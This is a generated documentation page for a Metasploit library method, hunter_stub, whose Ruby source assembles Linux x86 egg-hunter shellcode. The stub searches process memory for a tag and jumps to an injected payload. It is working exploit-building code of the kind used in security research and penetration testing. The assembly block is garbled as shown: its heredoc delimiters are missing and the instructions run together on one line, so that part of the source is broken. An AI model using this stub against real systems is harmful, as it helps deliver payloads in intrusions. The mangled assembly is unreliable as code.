Methods

Class/Module Index [+]

Quicksearch

Rex::Exploitation::Egghunter::Linux::X86

Constants

Alias

Public Instance Methods

hunter_stub(payload, badchars = '', opts = {}) click to toggle source

The egg hunter stub for linux/x86.

# File lib/rex/exploitation/egghunter.rb, line 246
def hunter_stub(payload, badchars = '', opts = {})

        startreg = opts[:startreg]

        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
        marker = "0x%x" % opts[:eggtag].unpack('V').first

        checksum = checksum_stub(payload, badchars, opts)

        startstub = ''
        if startreg
                if startreg.downcase != 'ecx'
                        startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
                else
                        startstub = "\n\tjmp next_addr"
                end
        end
        startstub << "\n\t" if startstub.length > 0

        assembly =         cld#{startstub}check_readable:        or cx,0xfffnext_addr:        inc ecx        push 0x43   ; use 'sigaction' syscall        pop eax        int 0x80        cmp al,0xf2        je check_readablecheck_for_tag:        ; check that the tag matches once        mov eax,#{marker}        mov edi,ecx        scasd        jne next_addr        ; it must match a second time too        scasd        jne next_addr        ; check the checksum if the feature is enabled#{checksum}        ; jump to the payload        jmp edi

        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

        # return the stub
        assembled_code
end

[Validate]

Generated with the Darkfish Rdoc Generator 2.